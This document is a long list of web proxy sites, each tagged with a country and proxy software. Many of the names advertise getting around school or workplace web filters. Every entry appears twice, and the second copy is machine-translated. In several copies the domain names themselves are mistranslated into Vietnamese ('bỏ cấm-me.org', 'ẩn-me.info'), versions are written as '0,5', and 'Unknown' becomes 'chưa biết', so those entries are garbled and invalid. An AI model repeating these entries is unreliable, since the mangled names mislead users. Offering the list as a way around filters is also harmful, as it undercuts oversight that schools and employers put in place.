* shh3.info (US, Glype) shh3.info (US, Glype)
* computerlabviewer.info (US, Glype) computerlabviewer.info (US, Glype)
* freeblox35.info (US, Glype) freeblox35.info (US, Glype)
* superbowlinlondon.co.uk (US, PHProxy 0.5) superbowlinlondon.co.uk (US, PHProxy 0,5)
* launchgoogle.com (US, Glype) launchgoogle.com (US, Glype)
* likeshut.cn (US, Glype) likeshut.cn (US, Glype)
* 82i.info (US, Glype) 82i.info (US, Glype)
* freeit4.info (US, Glype) freeit4.info (US, Glype)
* thisgameishard.info (US, PHProxy 0.5) thisgameishard.info (US, PHProxy 0,5)
* peachway.info (US, Glype) peachway.info (US, Glype)
* trustedsurf.info (US, PHProxy 0.5) trustedsurf.info (US, PHProxy 0,5)
* veganplan.com (US, PHProxy 0.5) veganplan.com (US, PHProxy 0,5)
* slipthru.info (US, PHProxy 0.5) slipthru.info (US, PHProxy 0,5)
* libertygamer.com (US, Glype) libertygamer.com (US, Glype)
* hmhf.net (US, PHProxy 0.5) hmhf.net (US, PHProxy 0,5)
* shortbump.com (US, CGIProxy) shortbump.com (US, CGIProxy)
* bloxgone19.info (US, Glype) bloxgone19.info (US, Glype)
* hqd.in (US, PHProxy 0.5) hqd.in (US, PHProxy 0,5)
* proxyfreely.com (CA, Glype) proxyfreely.com (CA, Glype)
* allysurf.info (US, PHProxy 0.5) allysurf.info (US, PHProxy 0,5)
* oity.info (US, Glype) oity.info (US, Glype)
* bitlot.cn (US, Glype) bitlot.cn (US, Glype)
* 0sheep.info (US, Glype) 0sheep.info (US, Glype)
* anon5.com (US, CGIProxy) anon5.com (US, CGIProxy)
* hide-me.info (US, PHProxy 0.5) ẩn-me.info (US, PHProxy 0,5)
* letcall.info (US, Glype) letcall.info (US, Glype)
* equalbitter.cn (US, Glype) equalbitter.cn (US, Glype)
* gbpro.info (NL, Glype) gbpro.info (NL, Glype)
* 5gc.info (US, Glype) 5gc.info (US, Glype)
* unblock-me.org (US, Glype) bỏ cấm-me.org (US, Glype)
* 000prox.info (NL, Glype) 000prox.info (NL, Glype)
* pocy.info (US, Glype) pocy.info (US, Glype)
* filtermyspace.info (US, PHProxy 0.5) filtermyspace.info (US, PHProxy 0,5)
* h8m.net (US, Glype) h8m.net (US, Glype)
* unblockmyspaceschool.info (US, PHProxy 0.5) unblockmyspaceschool.info (US, PHProxy 0,5)
* avoiddetection.info (US, Glype) avoiddetection.info (US, Glype)
* kittypurr.info (US, Glype) kittypurr.info (US, Glype)
* hidestation.info (US, Glype) hidestation.info (US, Glype)
* morporkia.com (US, Glype) morporkia.com (US, Glype)
* uqzu.com (US, Glype) uqzu.com (US, Glype)
* radmonkey.info (US, PHProxy 0.5) radmonkey.info (US, PHProxy 0,5)
* sniffysniff.info (US, PHProxy 0.5) sniffysniff.info (US, PHProxy 0,5)
* xxxunlock.info (US, Glype) xxxunlock.info (US, Glype)
* qlicq.us (US, PHProxy 0.5) qlicq.us (US, PHProxy 0,5)
* letround.info (US, Glype) letround.info (US, Glype)
* sfilter.info (US, Glype) sfilter.info (US, Glype)
* busysurf.info (US, PHProxy 0.5) busysurf.info (US, PHProxy 0,5)
* fastproxynetwork.cn (US, Glype) fastproxynetwork.cn (US, Glype)
* blingproxy.info (LT, PHProxy 0.5) blingproxy.info (LT, PHProxy 0,5)
* filtersneak.net (US, CGIProxy) filtersneak.net (US, CGIProxy)
* unfallinglove.info (KR, Glype) unfallinglove.info (KR, Glype)
* youtubeproxy.ws (US, CGIProxy) youtubeproxy.ws (US, CGIProxy)
* advanceprivacy.info (US, PHProxy 0.5) advanceprivacy.info (US, PHProxy 0,5)
* onlinecover.info (US, Glype) onlinecover.info (US, Glype)
* unbeatable.in (US, Glype) unbeatable.in (US, Glype)
* phpbido.net (US, Glype) phpbido.net (US, Glype)
* inspy.info (US, PHProxy 0.5) inspy.info (US, PHProxy 0,5)
* yahoothis.info (US, Glype) yahoothis.info (US, Glype)
* automaticround.cn (US, Glype) automaticround.cn (US, Glype)
* unblockyoutube.tv (US, CGIProxy) unblockyoutube.tv (US, CGIProxy)
* bloxoff15.info (US, Glype) bloxoff15.info (US, Glype)
* topwaves.info (US, PHProxy 0.5) topwaves.info (US, PHProxy 0,5)
* neuroproxy.info (US, Glype) neuroproxy.info (US, Glype)
* p3x.info (US, Glype) p3x.info (US, Glype)
* bballtickets.info (US, Glype) bballtickets.info (US, Glype)
* pawldis.info (US, PHProxy 0.5) pawldis.info (US, PHProxy 0,5)
* bypasskey.info (US, PHProxy 0.5) bypasskey.info (US, PHProxy 0,5)
* lnbh.info (US, Glype) lnbh.info (US, Glype)
* no-block.com (US, PHProxy 0.4) không-block.com (US, PHProxy 0,4)
* goofplay.info (US, Glype) goofplay.info (US, Glype)
* classifiedscrossing.com (US, PHProxy 0.5) classifiedscrossing.com (US, PHProxy 0,5)
* salmonway.info (US, Glype) salmonway.info (US, Glype)
* aliveunblocker.com (US, PHProxy 0.5) aliveunblocker.com (US, PHProxy 0,5)
* ykw.in (US, PHProxy 0.5) ykw.in (US, PHProxy 0,5)
* bloxaway29.info (US, Glype) bloxaway29.info (US, Glype)
* jvn.in (US, Glype) jvn.in (US, Glype)
* unlocksurf.com (US, Glype) unlocksurf.com (US, Glype)
* infobud.cn (US, Glype) infobud.cn (US, Glype)
* blocksoff29.info (US, Glype) blocksoff29.info (US, Glype)
* uw5.info (US, Glype) uw5.info (US, Glype)
* funkyunblocker.info (US, PHProxy 0.5) funkyunblocker.info (US, PHProxy 0,5)
* bloxoff42.info (US, Glype) bloxoff42.info (US, Glype)
* iavoidfilters.info (US, PHProxy 0.5) iavoidfilters.info (US, PHProxy 0,5)
* surf333.info (US, Glype) surf333.info (US, Glype)
* getonfacebookatwork.info (US, Misc PHP) getonfacebookatwork.info (US, Misc PHP)
* teamskip.com (GB, PHProxy 0.5) teamskip.com (GB, PHProxy 0,5)
* unblock-school-websites.info (US, Glype) bỏ cấm-trường-websites.info (US, Glype)
* bypass9.info (PHProxy 0.5) bypass9.info (PHProxy 0,5)
* healthyclean.cn (US, Glype) healthyclean.cn (US, Glype)
* budit.cn (US, PHProxy 0.5) budit.cn (US, PHProxy 0,5)
* entrosurf.info (US, Glype) entrosurf.info (US, Glype)
* feeblefixed.cn (US, Glype) feeblefixed.cn (US, Glype)
* theespresso.info (IN, Glype) theespresso.info (IN, Glype)
* zipproxy.info (US, PHProxy 0.5) zipproxy.info (US, PHProxy 0,5)
* mydailyjob.com (US, PHProxy 0.5, SSL) mydailyjob.com (US, PHProxy 0,5, SSL)
* unblockthatworld.info (US, CGIProxy) unblockthatworld.info (US, CGIProxy)
* bfree7.info (US, Glype) bfree7.info (US, Glype)
* surfjunk.info (US, PHProxy 0.5) surfjunk.info (US, PHProxy 0,5)
* 0221.info (US, Misc PHP) 0221.info (US, Misc PHP)
* wegito.info (US, Glype) wegito.info (US, Glype)
* hideatskool.info (US, Glype) hideatskool.info (US, Glype)
* unlockwebsites.info (US, CGIProxy) unlockwebsites.info (US, CGIProxy)
* eyeshoe.com (US, PHProxy 0.5) eyeshoe.com (US, PHProxy 0,5)
* orph.info (US, Glype) orph.info (US, Glype)
* icanhazprxy.info (US, PHProxy 0.5) icanhazprxy.info (US, PHProxy 0,5)
* hotsubstitute4you.info (US, Glype) hotsubstitute4you.info (US, Glype)
* blowitup.info (US, Glype) blowitup.info (US, Glype)
* proxc.info (US, Glype) proxc.info (US, Glype)
* veonh.com (US, Glype) veonh.com (US, Glype)
* w84m.net (US, Glype) w84m.net (US, Glype)
* skipadmin.com (GB, PHProxy 0.5) skipadmin.com (GB, PHProxy 0,5)
* chalkwalk.info (US, PHProxy 0.5) chalkwalk.info (US, PHProxy 0,5)
* secureanon.info (US, PHProxy 0.5) secureanon.info (US, PHProxy 0,5)
* bloxaway28.info (US, Glype) bloxaway28.info (US, Glype)
* 6on.info (US, Glype) 6on.info (US, Glype)
* finances-news.info (US, Glype) tài chính-news.info (US, Glype)
* eniz.info (US, Glype) eniz.info (US, Glype)
* 0blocks.info (US, Glype) 0blocks.info (US, Glype)
* unblockus.net (US, PHProxy 0.5) unblockus.net (US, PHProxy 0,5)
* wootproxy.info (GB, Glype) wootproxy.info (GB, Glype)
* sub1.info (US, Glype) sub1.info (US, Glype)
* dancenowinternational.info (GB, PHProxy 0.5) dancenowinternational.info (GB, PHProxy 0,5)
* destroyblocks.info (US, PHProxy 0.5) destroyblocks.info (US, PHProxy 0,5)
* utopiapal.com (US, Glype) utopiapal.com (US, Glype)
* collegelive.info (US, Glype) collegelive.info (US, Glype)
* rocketunblock.com (US, CGIProxy) rocketunblock.com (US, CGIProxy)
* lqg.in (US, PHProxy 0.5) lqg.in (US, PHProxy 0,5)
* hippiesurf.info (US, PHProxy 0.5) hippiesurf.info (US, PHProxy 0,5)
* creditbailouts.com (US, CGIProxy) creditbailouts.com (US, CGIProxy)
* fanfirm.info (US, Glype) fanfirm.info (US, Glype)
* publicentry.com (US, PHProxy 0.4) publicentry.com (US, PHProxy 0,4)
* freedomrights.info (US, Glype) freedomrights.info (US, Glype)
* computersnews.info (US, Glype) computersnews.info (US, Glype)
* schoolingprox.info (US, PHProxy 0.5) schoolingprox.info (US, PHProxy 0,5)
* phproxys.info (US, PHProxy 0.5) phproxys.info (US, PHProxy 0,5)
* rocketspeedsportscar.info (US, Misc PHP) rocketspeedsportscar.info (US, Misc PHP)
* 20hr.info (US, Glype) 20hr.info (US, Glype)
* thet.info (US, Glype) thet.info (US, Glype)
* beyondblox80.info (US, Glype) beyondblox80.info (US, Glype)
* opul.info (US, Glype) opul.info (US, Glype)
* harshsalary.info (US, Glype) harshsalary.info (US, Glype)
* deadterror.com (US, PHProxy 0.5) deadterror.com (US, PHProxy 0,5)
* surftheglobe.info (US, Glype) surftheglobe.info (US, Glype)
* beyondblox65.info (US, Glype) beyondblox65.info (US, Glype)
* tarotsigns.info (US, Glype) tarotsigns.info (US, Glype)
* proxydog.info (US, Glype) proxydog.info (US, Glype)
* goofhigh.info (US, Glype) goofhigh.info (US, Glype)
* 8cy.info (US, Glype) 8cy.info (US, Glype)
* mgomo.com (US, PHProxy 0.5) mgomo.com (US, PHProxy 0,5)
* synonym24.com (US, Glype) synonym24.com (US, Glype)
* moviewindow.info (US, Glype) moviewindow.info (US, Glype)
* 0823.info (US, Misc PHP) 0823.info (US, Misc PHP)
* youcantseeme.info (US, PHProxy 0.5) youcantseeme.info (US, PHProxy 0,5)
* loans-office.info (US, PHProxy 0.5) vay-office.info (US, PHProxy 0,5)
* proxes.info (US, Glype) proxes.info (US, Glype)
* proxmania.com (US, Glype) proxmania.com (US, Glype)
* zprox.info (US, PHProxy 0.5) zprox.info (US, PHProxy 0,5)
* gossipsurf.info (US, Glype) gossipsurf.info (US, Glype)
* tinyunblock.info (NL, Glype) tinyunblock.info (NL, Glype)
* alotofproxy.com (US, PHProxy 0.5) alotofproxy.com (US, PHProxy 0,5)
* 25min.info (US, Glype) 25min.info (US, Glype)
* lgq.in (US, PHProxy 0.5) lgq.in (US, PHProxy 0,5)
* vb7.info (US, Glype) vb7.info (US, Glype)
* cupr.info (US, Glype) cupr.info (US, Glype)
* angryyoung.cn (US, Glype) angryyoung.cn (US, Glype)
* directcompetitor.info (US, Glype) directcompetitor.info (US, Glype)
* fast2open.info (US, Glype) fast2open.info (US, Glype)
* letso.info (US, Glype) letso.info (US, Glype)
* unblockall.net (US, PHProxy 0.5) unblockall.net (US, PHProxy 0,5)
* lostwebpage.info (US, CGIProxy) lostwebpage.info (US, CGIProxy)
* streamseven.info (US, Glype) streamseven.info (US, Glype)
* proxify.biz (US, CGIProxy, SSL) proxify.biz (US, CGIProxy, SSL)
* finalexamstudy.com (US, CGIProxy) finalexamstudy.com (US, CGIProxy)
* yousneak.net (US, PHProxy 0.5) yousneak.net (US, PHProxy 0,5)
* hx17.info (US, PHProxy 0.5) hx17.info (US, PHProxy 0,5)
* unblockedmyspace.net (US, Unknown) unblockedmyspace.net (US, chưa biết)
* goslowly.info (US, PHProxy 0.5) goslowly.info (US, PHProxy 0,5)
* bigsubstitutestore.info (US, Glype) bigsubstitutestore.info (US, Glype)
* bfree8.info (US, Glype) bfree8.info (US, Glype)
* payfortoday.com (US, PHProxy 0.5) payfortoday.com (US, PHProxy 0,5)
* cantbustme.com (US, PHProxy 0.5) cantbustme.com (US, PHProxy 0,5)
* adultproxy.cn (LT, Glype) adultproxy.cn (LT, Glype)
* surfcharm.info (US, Glype) surfcharm.info (US, Glype)
* wesneakuby.info (US, PHProxy 0.5) wesneakuby.info (US, PHProxy 0,5)
* yaoh.info (US, Glype) yaoh.info (US, Glype)
* lyat.info (US, Glype) lyat.info (US, Glype)
* usatoday-topnews.info (US, CGIProxy) usatoday-topnews.info (US, CGIProxy)
* greatsharp.cn (US, Glype) greatsharp.cn (US, Glype)
* fasterone.info (US, Glype) fasterone.info (US, Glype)
* utunnel.cn (US, Glype) utunnel.cn (US, Glype)
* hidetheweb.info (US, Unknown) hidetheweb.info (US, chưa biết)
* bitterhigh.cn (US, Glype) bitterhigh.cn (US, Glype)
* anonymousely.com (US, PHProxy 0.5) anonymousely.com (US, PHProxy 0,5)
* dustyink.info (US, PHProxy 0.5) dustyink.info (US, PHProxy 0,5)
* a1p.org (US, Glype) a1p.org (US, Glype)
* labl.info (US, Glype) labl.info (US, Glype)
* bloxaway4.info (US, Glype) bloxaway4.info (US, Glype)
* bypassingfilters.com (US, CGIProxy) bypassingfilters.com (US, CGIProxy)
* lovewebproxy.com (US, Glype) lovewebproxy.com (US, Glype)
* whitesurf002.info (US, PHProxy 0.5) whitesurf002.info (US, PHProxy 0,5)
* beyondblox46.info (US, Glype) beyondblox46.info (US, Glype)
* com-today.info (US, Glype) com-today.info (US, Glype)
* daddythat.info (US, Glype) daddythat.info (US, Glype)
* nicecleanfun.info (US, CGIProxy) nicecleanfun.info (US, CGIProxy)
* nqg.in (US, PHProxy 0.5) nqg.in (US, PHProxy 0,5)
* htunnel.cn (US, Glype) htunnel.cn (US, Glype)
* ninjabreastenlargement.info (US, Glype) ninjabreastenlargement.info (US, Glype)
* xinproxy.com (US, Glype) xinproxy.com (US, Glype)
* ooph.info (US, Glype) ooph.info (US, Glype)
* 55me.info (US, Glype) 55me.info (US, Glype)
* privacykeeper.info (US, Glype) privacykeeper.info (US, Glype)
* surfhawk.info (US, Glype) surfhawk.info (US, Glype)
* sslbrowse.com (DE, Glype) sslbrowse.com (DE, Glype)
* 1cup.info (US, Unknown) 1cup.info (US, chưa biết)
* myspacebrowser.net (US, PHProxy 0.5) myspacebrowser.net (US, PHProxy 0,5)
* axfacebook.info (US, Glype) axfacebook.info (US, Glype)
* flufs.com (US, PHProxy 0.5) flufs.com (US, PHProxy 0,5)
* big-cloak.info (FR, PHProxy 0.5) big-cloak.info (FR, PHProxy 0,5)
* filterme.info (US, Glype) filterme.info (US, Glype)
* ebalo.info (NL, Glype) ebalo.info (NL, Glype)
* theavoid.info (US, PHProxy 0.5) theavoid.info (US, PHProxy 0,5)
* mero2.info (US, Glype) mero2.info (US, Glype)
* icanhazproxyburger.info (US, PHProxy 0.5) icanhazproxyburger.info (US, PHProxy 0,5)
* peekthru.info (US, PHProxy 0.5) peekthru.info (US, PHProxy 0,5)
* 3week.info (US, Glype) 3week.info (US, Glype)
* amberway.info (US, Glype) amberway.info (US, Glype)
* sms4u.in (US, Glype) sms4u.in (US, Glype)
* yourbypass.info (US, Glype) yourbypass.info (US, Glype)
* astroproxy.info (FR, PHProxy 0.5) astroproxy.info (FR, PHProxy 0,5)
* chandan.org (US, Glype) chandan.org (US, Glype)
* yja.in (US, PHProxy 0.5) yja.in (US, PHProxy 0,5)
* unblockedorkut.info (US, Glype) unblockedorkut.info (US, Glype)
* wtfmytv.info (US, Glype) wtfmytv.info (US, Glype)
* fullofmeat.info (US, Glype) fullofmeat.info (US, Glype)
* fraction.ws (US, CGIProxy) fraction.ws (US, CGIProxy)
* freeit22.info (US, Glype) freeit22.info (US, Glype)
* unblock-the-web.info (DE, PHProxy 0.5) bỏ cấm-the-web.info (DE, PHProxy 0,5)
* server4proxy.info (US, Glype) server4proxy.info (US, Glype)
* hidespy.info (US, Unknown) hidespy.info (US, chưa biết)
* tankproxy.com (US, CGIProxy) tankproxy.com (US, CGIProxy)
* surfcave.info (US, CGIProxy) surfcave.info (US, CGIProxy)
* tunnelr.info (US, Glype) tunnelr.info (US, Glype)
* internetholiday.info (US, CGIProxy) internetholiday.info (US, CGIProxy)
* freeblox52.info (US, Glype) freeblox52.info (US, Glype)
* geotunnel.com (US, CGIProxy) geotunnel.com (US, CGIProxy)
* bigsubstitute2u.info (US, Glype) bigsubstitute2u.info (US, Glype)
* missingip.info (US, Surrogafier) missingip.info (US, Surrogafier)
* ubfirewall.info (US, Glype) ubfirewall.info (US, Glype)
* myspacepro.info (US, Glype) myspacepro.info (US, Glype)
* nsfwwindow.info (US, Glype) nsfwwindow.info (US, Glype)
* hi5site.info (US, PHProxy 0.5) hi5site.info (US, PHProxy 0,5)
* fastmusclecars.info (US, Unknown) fastmusclecars.info (US, chưa biết)
* browse10.info (US, PHProxy 0.5) browse10.info (US, PHProxy 0,5)
* dorh.info (US, Glype) dorh.info (US, Glype)
* ymw.in (US, PHProxy 0.5) ymw.in (US, PHProxy 0,5)
* hideblast.info (US, PHProxy 0.5) hideblast.info (US, PHProxy 0,5)
* filterg.info (US, Glype) filterg.info (US, Glype)
* iloveproxy.us (US, Glype) iloveproxy.us (US, Glype)
* bloxgo19.info (US, Glype) bloxgo19.info (US, Glype)
* qdirection.info (US, Glype) qdirection.info (US, Glype)
* runlikehell.info (US, PHProxy 0.5) runlikehell.info (US, PHProxy 0,5)
* faec.info (US, Glype) faec.info (US, Glype)
* bloxgone41.info (US, Glype) bloxgone41.info (US, Glype)
* demo.glype.com (US, Glype) demo.glype.com (US, Glype)
* kroxy.net (US, PHProxy 0.5) kroxy.net (US, PHProxy 0,5)
* myproxin.info (US, Glype) myproxin.info (US, Glype)
* freeblox54.info (US, Glype) freeblox54.info (US, Glype)
* a-4.info (US, PHProxy 0.5) a-4.info (US, PHProxy 0,5)
* icanhazproxysurf.info (US, PHProxy 0.5) icanhazproxysurf.info (US, PHProxy 0,5)
* 0-afastproxy.info (US, Glype) 0-afastproxy.info (US, Glype)
* urnf.info (US, Glype) urnf.info (US, Glype)
* xuvy.com (US, Glype) xuvy.com (US, Glype)
* jolljoy.com (US, Glype) jolljoy.com (US, Glype)
* hbsite.info (US, Glype) hbsite.info (US, Glype)
* revivalsurf.info (US, PHProxy 0.5) revivalsurf.info (US, PHProxy 0,5)
* birdworld.info (US, Glype) birdworld.info (US, Glype)
* urub.info (US, PHProxy 0.5) urub.info (US, PHProxy 0,5)
* yjv.in (US, PHProxy 0.5) yjv.in (US, PHProxy 0,5)
* parallelsimple.cn (US, Glype) parallelsimple.cn (US, Glype)
* unblockthegames.com (US, PHProxy 0.5) unblockthegames.com (US, PHProxy 0,5)
* 0pe.info (US, Glype) 0pe.info (US, Glype)
* stalinsurf.info (US, PHProxy 0.5) stalinsurf.info (US, PHProxy 0,5)
* iwanthide.info (US, Glype) iwanthide.info (US, Glype)
* sin.us (US, Glype) sin.us (US, Glype)
* fixeddifferent.cn (US, Glype) fixeddifferent.cn (US, Glype)
* mondayallweek.info (US, Glype) mondayallweek.info (US, Glype)
* englishtutoringzone.info (US, Unknown) englishtutoringzone.info (US, chưa biết)
* 5on.info (US, Glype) 5on.info (US, Glype)
* bloxgone50.info (US, Glype) bloxgone50.info (US, Glype)
* privacyneeded.org (US, Glype) privacyneeded.org (US, Glype)
* inunder.info (US, Glype) inunder.info (US, Glype)
* cityboi.info (US, Glype) cityboi.info (US, Glype)
* maskonline.info (US, PHProxy 0.5) maskonline.info (US, PHProxy 0,5)
* room100.info (US, Glype) room100.info (US, Glype)
* 9week.info (US, Glype) 9week.info (US, Glype)
* hidebypass.info (US, PHProxy 0.5) hidebypass.info (US, PHProxy 0,5)
* shuthanging.cn (US, Glype) shuthanging.cn (US, Glype)
* ninjacredit.info (US, Glype) ninjacredit.info (US, Glype)
* uloans.info (US, PHProxy 0.5) uloans.info (US, PHProxy 0,5)
* havinfun.info (CA, PHProxy 0.5) havinfun.info (CA, PHProxy 0,5)
* ueee.info (US, PHProxy 0.5) ueee.info (US, PHProxy 0,5)
* 7e7.info (US, Glype) 7e7.info (US, Glype) 

* adulthelper.info (US, Glype) adulthelper.info (US, Glype)
* ibrowsefree.com (US, PHProxy 0.5) ibrowsefree.com (US, PHProxy 0,5)
* instantunblock.com (US, CGIProxy) instantunblock.com (US, CGIProxy)
* sorro.info (US, Glype) sorro.info (US, Glype)
* parallelprivate.cn (US, Glype) parallelprivate.cn (US, Glype)
* freeit8.info (US, Glype) freeit8.info (US, Glype)
* beyondblox72.info (US, Glype) beyondblox72.info (US, Glype)
* orangeproxy.net (US, PHProxy 0.4) orangeproxy.net (US, PHProxy 0,4)
* meown.net (US, PHProxy 0.5) meown.net (US, PHProxy 0,5)
* freewebproxy.net (US, PHProxy 0.4) freewebproxy.net (US, PHProxy 0,4)
* anoniemsurfen.info (US, PHProxy 0.5) anoniemsurfen.info (US, PHProxy 0,5)
* quq1.com (US, Glype) quq1.com (US, Glype)
* freeblox33.info (US, Glype) freeblox33.info (US, Glype)
* movieadvise.info (US, PHProxy 0.5) movieadvise.info (US, PHProxy 0,5)
* beyondblox79.info (US, Glype) beyondblox79.info (US, Glype)
* freeblox4.info (US, Glype) freeblox4.info (US, Glype)
* qha.in (US, PHProxy 0.5) qha.in (US, PHProxy 0,5)
* bloxgo2.info (US, Glype) bloxgo2.info (US, Glype)
* angryant.info (US, Unknown) angryant.info (US, chưa biết)
* malewhite.cn (US, Glype) malewhite.cn (US, Glype)
* watch-naruto-online.info (US, Glype) watch-naruto-online.info (US, Glype)
* schoolworksucks.com (US, CGIProxy) schoolworksucks.com (US, CGIProxy)
* learningmathsonline.info (US, Glype) learningmathsonline.info (US, Glype)
* generalmilitary.cn (US, Glype) generalmilitary.cn (US, Glype)
* ltunnel.net (US, CGIProxy) ltunnel.net (US, CGIProxy)
* gfacebook.info (US, Glype) gfacebook.info (US, Glype)
* kfhf.info (US, Glype) kfhf.info (US, Glype)
* mqg.in (US, PHProxy 0.5) mqg.in (US, PHProxy 0,5)
* ibypass.biz (US, PHProxy 0.4) ibypass.biz (US, PHProxy 0,4)
* freeit7.info (US, Glype) freeit7.info (US, Glype)
* proxypost.org (US, Glype) proxypost.org (US, Glype)
* freeit18.info (US, Glype) freeit18.info (US, Glype)
* ineedthistool.cn (CN, PHProxy 0.5) ineedthistool.cn (CN, PHProxy 0,5)
* ulne.info (US, Glype) ulne.info (US, Glype)
* orangefilter.info (US, Glype) orangefilter.info (US, Glype)
* livingshut.cn (US, Glype) livingshut.cn (US, Glype)
* yjl.in (US, PHProxy 0.5) yjl.in (US, PHProxy 0,5)
* proxyjob.info (SE, PHProxy 0.5) proxyjob.info (SE, PHProxy 0,5)
* gopass.info (US, Glype) gopass.info (US, Glype)
* jiggyboom.info (US, Glype) jiggyboom.info (US, Glype)
* goopler.net (CA, Glype) goopler.net (CA, Glype)
* netevader.org (US, PHProxy 0.5) netevader.org (US, PHProxy 0,5)
* myninja.info (US, PHProxy 0.5) myninja.info (US, PHProxy 0,5)
* unblock24.de (DE, PHProxy 0.5) unblock24.de (DE, PHProxy 0,5)
* sadyoung.cn (US, Glype) sadyoung.cn (US, Glype)
* argentinapowa.com (US, Glype) argentinapowa.com (US, Glype)
* goodgets.info (US, Glype) goodgets.info (US, Glype)
* smoothdownload.info (US, Glype) smoothdownload.info (US, Glype)
* salivasurf.info (US, PHProxy 0.5) salivasurf.info (US, PHProxy 0,5)
* sonic-firewalls.info (US, Glype) âm-firewalls.info (US, Glype)
* gur7.info (US, PHProxy 0.5) gur7.info (US, PHProxy 0,5)
* codesquad.cn (US, Glype) codesquad.cn (US, Glype)
* addb.info (US, PHProxy 0.5) addb.info (US, PHProxy 0,5)
* iphiding.info (CA, Glype) iphiding.info (CA, Glype)
* crushblocks.info (US, PHProxy 0.5) crushblocks.info (US, PHProxy 0,5)
* lqp.in (US, PHProxy 0.5) lqp.in (US, PHProxy 0,5)
* pawxy.com (US, PHProxy 0.4) pawxy.com (US, PHProxy 0,4)
* surfvampire.info (US, Glype) surfvampire.info (US, Glype)
* bloxgo1.info (US, Glype) bloxgo1.info (US, Glype)
* brightflat.cn (US, Glype) brightflat.cn (US, Glype)
* hotsubstituteforyou.info (US, Glype) hotsubstituteforyou.info (US, Glype)
* ratr.info (US, Glype) ratr.info (US, Glype)
* fjx.biz (US, Glype) fjx.biz (US, Glype)
* petu.info (US, Glype) petu.info (US, Glype)
* blockmenotnetwork.com (US, Glype) blockmenotnetwork.com (US, Glype)
* lgl.lu (LU, Unknown) lgl.lu (LU, chưa biết)
* deepdark.cn (US, Glype) deepdark.cn (US, Glype)
* sput.info (US, Glype) sput.info (US, Glype)
* useeall.info (CA, PHProxy 0.5) useeall.info (CA, PHProxy 0,5)
* i-surfree.com (US, PHProxy 0.5) i-surfree.com (US, PHProxy 0,5)
* ripadmin.com (GB, PHProxy 0.5) ripadmin.com (GB, PHProxy 0,5)
* proxyzoom.info (US, PHProxy 0.5) proxyzoom.info (US, PHProxy 0,5)
* ziii.info (US, PHProxy 0.5) ziii.info (US, PHProxy 0,5)
* hulksurf.info (CA, PHProxy 0.5) hulksurf.info (CA, PHProxy 0,5)
* tunnelurl.com (US, Glype) tunnelurl.com (US, Glype)
* hotsubstitute2u.info (US, Glype) hotsubstitute2u.info (US, Glype)
* 4-6.us (US, Glype) 4-6.us (US, Glype)
* fastsneeky.info (US, Glype) fastsneeky.info (US, Glype)
* coondog.info (US, PHProxy 0.5) coondog.info (US, PHProxy 0,5)
* 7fish.info (US, Glype) 7fish.info (US, Glype)
* nossl.info (NL, Glype) nossl.info (NL, Glype)
* wolu.info (US, PHProxy 0.5) wolu.info (US, PHProxy 0,5)
* mathblows.info (US, CGIProxy) mathblows.info (US, CGIProxy)
* my-webproxy.de (DE, PHProxy 0.5) tôi-webproxy.de (DE, PHProxy 0,5)
* trackless.co.uk (US, PHProxy 0.5) trackless.co.uk (US, PHProxy 0,5)
* unblocking24.com (US, Glype) unblocking24.com (US, Glype)
* unblocksite.us (US, PHProxy 0.5) unblocksite.us (US, PHProxy 0,5)
* infoorder.cn (US, Glype) infoorder.cn (US, Glype)
* mytunnel0.info (US, Glype) mytunnel0.info (US, Glype)
* ayoutube.info (US, Glype) ayoutube.info (US, Glype)
* pr0xybypasser.info (US, Glype) pr0xybypasser.info (US, Glype)
* nsq.in (US, PHProxy 0.5) nsq.in (US, PHProxy 0,5)
* karunadu.in (US, Glype) karunadu.in (US, Glype)
* frozenpass.info (US, PHProxy 0.5) frozenpass.info (US, PHProxy 0,5)
* nicetrick.info (NL, PHProxy 0.5) nicetrick.info (NL, PHProxy 0,5)
* proxhost.us (DE, Glype) proxhost.us (DE, Glype)
* ufacebook.info (US, Glype) ufacebook.info (US, Glype)
* ctunnel.cn (US, Glype) ctunnel.cn (US, Glype)
* myspaceavenue.info (US, PHProxy 0.5) myspaceavenue.info (US, PHProxy 0,5)
* acidquiet.cn (US, Glype) acidquiet.cn (US, Glype)
* launchwebs.org (US, Glype) launchwebs.org (US, Glype)
* streamfour.info (US, Glype) streamfour.info (US, Glype)
* todayseducation.info (US, Glype) todayseducation.info (US, Glype)
* pler.info (US, Glype) pler.info (US, Glype)
* phhu.com (US, Glype) phhu.com (US, Glype)
* trul.info (US, Glype) trul.info (US, Glype)
* 312x.info (US, Glype) 312x.info (US, Glype)
* 6turn.info (US, Glype) 6turn.info (US, Glype)
* planetunblocker.info (US, Glype) planetunblocker.info (US, Glype)
* bloxgone39.info (US, Glype) bloxgone39.info (US, Glype)
* blocksoff42.info (US, Glype) blocksoff42.info (US, Glype)
* breakcube.info (US, PHProxy 0.5) breakcube.info (US, PHProxy 0,5)
* nocansee.info (CA, PHProxy 0.5) nocansee.info (CA, PHProxy 0,5)
* faster-proxy.com (US, Glype) nhanh hơn-proxy.com (US, Glype)
* word9.info (US, Glype) word9.info (US, Glype)
* a85.info (US, PHProxy 0.5) a85.info (US, PHProxy 0,5)
* comicbookguy.info (US, CGIProxy) comicbookguy.info (US, CGIProxy)
* getlostfast.info (US, CGIProxy) getlostfast.info (US, CGIProxy)
* britishsurf.info (US, PHProxy 0.5) britishsurf.info (US, PHProxy 0,5)
* cleany.biz (US, PHProxy 0.5) cleany.biz (US, PHProxy 0,5)
* dodge2u.info (US, PHProxy 0.5) dodge2u.info (US, PHProxy 0,5)
* ufjk.com (US, Glype) ufjk.com (US, Glype)
* powersurfuk.com (GB, PHProxy 0.5) powersurfuk.com (GB, PHProxy 0,5)
* secureyou.info (US, Glype) secureyou.info (US, Glype)
* speedy-prox.info (US, PHProxy 0.5) nhanh-prox.info (US, PHProxy 0,5)
* beyondblox70.info (US, Glype) beyondblox70.info (US, Glype)
* earlysticky.cn (US, Glype) earlysticky.cn (US, Glype)
* workbreaker.info (US, Glype) workbreaker.info (US, Glype)
* upth.info (US, Glype) upth.info (US, Glype)
* 15x.info (US, Unknown) 15x.info (US, chưa biết)
* room9.info (US, Glype) room9.info (US, Glype)
* firebrickway.info (US, Glype) firebrickway.info (US, Glype)
* scyp.info (US, Glype) scyp.info (US, Glype)
* poxry.info (US, PHProxy 0.5) poxry.info (US, PHProxy 0,5)
* sneakyschool.info (US, Glype) sneakyschool.info (US, Glype)
* ateru.info (NL, Glype) ateru.info (NL, Glype)
* dependentparallel.cn (US, Glype) dependentparallel.cn (US, Glype)
* uhidden.com (US, Glype) uhidden.com (US, Glype)
